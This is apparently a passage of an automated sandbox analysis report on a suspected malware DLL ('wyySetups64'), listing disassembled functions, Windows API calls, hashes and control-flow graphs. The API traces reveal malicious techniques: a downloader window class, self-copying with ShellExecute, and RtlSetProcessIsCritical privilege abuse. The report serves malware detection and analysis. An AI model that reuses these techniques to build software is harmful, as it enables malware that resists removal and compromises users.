                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,msctls_progress32,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 10001AC3
                                                                                                                                                                                                              • SetWindowTheme.UXTHEME(00010420,10012444,10012440), ref: 10001ADE
                                                                                                                                                                                                              • SendMessageW.USER32(00010420,00000409,00000000,00D77800), ref: 10001AF7
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C), ref: 10001B08
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00001B80,?,00000000,00000000), ref: 10001B49
                                                                                                                                                                                                              • PostQuitMessage.USER32(00000000), ref: 10001B54
                                                                                                                                                                                                              • DefWindowProcW.USER32(00000002,?,?,?), ref: 10001B6D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$CreateMessage$CommonControlsHandleInitModulePostProcQuitSendThemeThreadmalloc
                                                                                                                                                                                                              • String ID: $msctls_progress32
                                                                                                                                                                                                              • API String ID: 1181878002-3669180086
                                                                                                                                                                                                              • Opcode ID: b9dbfd839ac4d6ccd5c8ee77aae33a48e54b131b2285833d3f814014fb2396b0
                                                                                                                                                                                                              • Instruction ID: 2e44a71670f0cdec86f34bb6316c117ddb1687e3aa8b51598d2db09470581217
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9dbfd839ac4d6ccd5c8ee77aae33a48e54b131b2285833d3f814014fb2396b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9431F6B4A44208FFF710DF94CC89FAA7BB5EB48741F208158FA09AB295D770E950CB65
                                                                                                                                                                                                              Function 10001830 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153windowregistryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 10001852
                                                                                                                                                                                                                • Part of subcall function 10001600: SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                                                                • Part of subcall function 10001600: wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                                                                • Part of subcall function 10001600: CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 100019AD
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,?,00000000,00000000,?,?,?,?,?,?,10011876), ref: 100019E8
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,10011876), ref: 100019F7
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000,00000000,00000000), ref: 10001A1E
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 10001A2C
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 10001A36
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageWindow$CallbackClassCreateDispatchDispatcherFolderFreeHandleKnownModulePathRegisterShowTaskTranslateUserwcstombs
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 919245287-1891997712
                                                                                                                                                                                                              • Opcode ID: d7e5858510ef4e4d2c6ac9c6255a0426f83fb6908b9dccf1c9d93bd52c33f40c
                                                                                                                                                                                                              • Instruction ID: 02b1e0a1a7493eeed2e2321454f16a2ce6d8cc5e573885ca1cf39a898ac010b9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d7e5858510ef4e4d2c6ac9c6255a0426f83fb6908b9dccf1c9d93bd52c33f40c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 215107B5D00318AFEB54CFA4CC45BDEBBB5FB48340F108169E119A7295EB746A44CF61
                                                                                                                                                                                                              Function 10010610 Relevance: 7.5, APIs: 5, Instructions: 28threadsynchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 1001061D
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000), ref: 10010624
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 10010639
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 1001064E
                                                                                                                                                                                                                • Part of subcall function 10001170: LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                                                                • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                                                                • Part of subcall function 10001170: GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                                                                • Part of subcall function 10001170: GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                                                                • Part of subcall function 10001170: RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                                                                • Part of subcall function 10001170: CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                                                              • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001065B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindowexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1070008423-0
                                                                                                                                                                                                              • Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                              • Instruction ID: b32196050963cedc899c835c863bf3fa77a81109efd19031f53f5ae39edb479e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 71E026B53C4354BBF265A7E05C8BF4936549B09F42F608650F309BD0E2CAF4B450C62D
                                                                                                                                                                                                              Function 1000F330 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135sleepCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 1000EE80: RpcStringBindingComposeW.RPCRT4(00000000,100124B8,localhost,100124CC,00000000,10001D8E), ref: 1000EEBE
                                                                                                                                                                                                              • _swprintf.LIBCMTD ref: 1000F3DC
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 1000F433
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 1000F484
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Sleep$BindingComposeString_swprintf
                                                                                                                                                                                                              • String ID: 5555555555
                                                                                                                                                                                                              • API String ID: 4095827290-304217070
                                                                                                                                                                                                              • Opcode ID: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
                                                                                                                                                                                                              • Instruction ID: fc69ec1e48ae5d690075e784bcaa941b9f802e524bc258fcaffae97851e079c3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1386329a5efce874629472e3114aa71895a9db344373e3eebb5de5ce6721f17b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B516DB5D00208ABEB14DFD4DC41BEFB7B8EB48340F108118FA05BB686D734AA44DBA1
                                                                                                                                                                                                              Function 10010450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126fileCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 10010380: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100103B3
                                                                                                                                                                                                                • Part of subcall function 10010330: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1001034E
                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,?,00000000), ref: 100105A6
                                                                                                                                                                                                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 100105CC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$ModuleName$CopyExecuteShell
                                                                                                                                                                                                              • String ID: %s\%s$open
                                                                                                                                                                                                              • API String ID: 689381381-538903891
                                                                                                                                                                                                              • Opcode ID: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
                                                                                                                                                                                                              • Instruction ID: 9fe97893565a199cb231c8e39f665fc81eb16fc602bb536f2ce1346a8447d072
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 830c5ba8e21fc8d3b44d54b6d08c68639795a16e1df432a09aa5f5a78e158d4f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED5190B4D04248ABEB14CFA0C891BEEBBB5EF05344F508198F5557B282DB75AB88CB51
                                                                                                                                                                                                              Function 1000F080 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 327 1000f080-1000f0a2 328 1000f0a9-1000f0b0 327->328 329 1000f0b6-1000f0d2 call 1000ff70 328->329 330 1000f1fb 328->330 333 1000f0d7-1000f0e1 329->333 331 1000f1fd-1000f200 330->331 334 1000f0e3 333->334 335 1000f0e8-1000f0ef 333->335 334->330 336 1000f0fa-1000f100 335->336 337 1000f1b4-1000f1bb 336->337 338 1000f106-1000f115 336->338 339 1000f1c6-1000f1cc 337->339 340 1000f118-1000f128 338->340 341 1000f1e1-1000f1f2 CoTaskMemFree 339->341 342 1000f1ce-1000f1df CoTaskMemFree 339->342 343 1000f12a-1000f12f 340->343 344 1000f15d-1000f162 340->344 346 1000f1f4 341->346 347 1000f1f6 341->347 342->339 348 1000f131-1000f143 343->348 349 1000f154-1000f15b 343->349 350 1000f165-1000f16f 344->350 346->330 347->328 348->344 351 1000f145-1000f152 348->351 349->350 352 1000f171-1000f178 350->352 353 1000f1af 350->353 351->340 351->349 355 1000f183-1000f189 352->355 353->336 356 1000f18b-1000f19c CoTaskMemFree 355->356 357 1000f19e-1000f1ad CoTaskMemFree 355->357 356->355 357->331
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 1000FF70: NdrClientCall2.RPCRT4 ref: 1000FF8F
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 1000F195
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 1000F1A2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeTask$Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3085621743-0
                                                                                                                                                                                                              • Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                              • Instruction ID: 92fa5dec9f22b8c7c1328a1cbf0c23ece76f2aec65bf6276d958f50508a6dbd7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB51F5B4E04209EBEF04CF94C894AEEB7B1FF48344F20815DE815A7748D735AA85EB91
                                                                                                                                                                                                              Function 10001600 Relevance: 4.6, APIs: 3, Instructions: 61COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetKnownFolderPath.SHELL32(10012340,00000000,00000000,00000000), ref: 1000165B
                                                                                                                                                                                                              • wcstombs.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,00000104), ref: 1000167A
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000,00000000,?), ref: 100016AE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FolderFreeKnownPathTaskwcstombs
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2577077003-0
                                                                                                                                                                                                              • Opcode ID: d300af7b25cb6414e2c33b3673a1f19339b002bae4b2470d2ba77c7d2a319cd1
                                                                                                                                                                                                              • Instruction ID: 5f7cab8de45bcdf2407ecebcb5d22f8ee1252467d95dee99cd854b3eb2a3a61a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d300af7b25cb6414e2c33b3673a1f19339b002bae4b2470d2ba77c7d2a319cd1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8B2117B1900219EBEB04DF94CC95BEEBBB4FF08700F108518F615AB295DB75AA44CBD0
                                                                                                                                                                                                              Function 1000FF40 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 373 1000ff40-1000ff6e NdrClientCall2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1775071923-0
                                                                                                                                                                                                              • Opcode ID: ce7b8f29c0631b2804a26d986689ba3f09b2f6ec28eda86620c8604702a4acd4
                                                                                                                                                                                                              • Instruction ID: 7492027a281e140068cdac0bb76a9e8e76146da9bd0683f37df95b5dae096a5d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce7b8f29c0631b2804a26d986689ba3f09b2f6ec28eda86620c8604702a4acd4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5ED05EF190100CBBDB05CF88CC42AA977ACE784205F00C069EA0AC6200E931AA904691
                                                                                                                                                                                                              Function 1000FF70 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 374 1000ff70-1000ffa1 NdrClientCall2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1775071923-0
                                                                                                                                                                                                              • Opcode ID: 1bc907cd574dd29b4d3e7ba9f4424db3402ad13f32cce3c6e12345c4effb2575
                                                                                                                                                                                                              • Instruction ID: 6afe2523060cff6880f9b4da93d12d89cb254fb88d74a93b831ee34bf0bcd51a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1bc907cd574dd29b4d3e7ba9f4424db3402ad13f32cce3c6e12345c4effb2575
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69D05EB190000CBBE705CF88CC12AE977ACE785305F00C069EA0A8A240E931AA544691
                                                                                                                                                                                                              Function 1000FFB0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 375 1000ffb0-1000ffe1 NdrClientCall2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1775071923-0
                                                                                                                                                                                                              • Opcode ID: 52255134d6b5ccea6af4de28952c25772812cd8c0d7113a6720df0c67090eddc
                                                                                                                                                                                                              • Instruction ID: 01a6fe9224db3f7d7e4205a28be5e1d10279d7ad68670d0b988955ce86484041
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52255134d6b5ccea6af4de28952c25772812cd8c0d7113a6720df0c67090eddc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2D05EB190100CBBE705CF88CC02AA977ADE784305F00C169FA0A86240E931AE504691
                                                                                                                                                                                                              Function 1000FFF0 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 376 1000fff0-10010021 NdrClientCall2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Call2Client
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1775071923-0
                                                                                                                                                                                                              • Opcode ID: 8713d8677658a6df8795b9ebb9893791690b4409c7e532052509524876d5dd8e
                                                                                                                                                                                                              • Instruction ID: 940d55c7aea47baa15732b8373ec63bb8ecc0fa7aba131a5eb793c07d5a03037
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8713d8677658a6df8795b9ebb9893791690b4409c7e532052509524876d5dd8e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77D05EB290000CBBE705CF88CC02AE977ACE784305F00C069EA0A86240EA31AA504691

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 10001170 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 87librarywindowloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(ntdll.dll), ref: 1000117B
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,RtlAdjustPrivilege), ref: 1000118D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,RtlSetProcessIsCritical), ref: 100011A1
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 100011FD
                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 10001211
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,ndowClass,indow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 10001236
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 10001251
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 1000125F
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 10001269
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                                                              • String ID: RtlAdjustPrivilege$RtlSetProcessIsCritical$indow$ndowClass$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3658383123-467612925
                                                                                                                                                                                                              • Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                              • Instruction ID: 32e2e5621d63ba41cde31a5517ede96aa96e783cbb1150e0d99a961b1b18e838
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A331F4B4D40218AFEB14DFE5CC89BDDBBB4FF48701F108119F60AAA294D7749690CB10
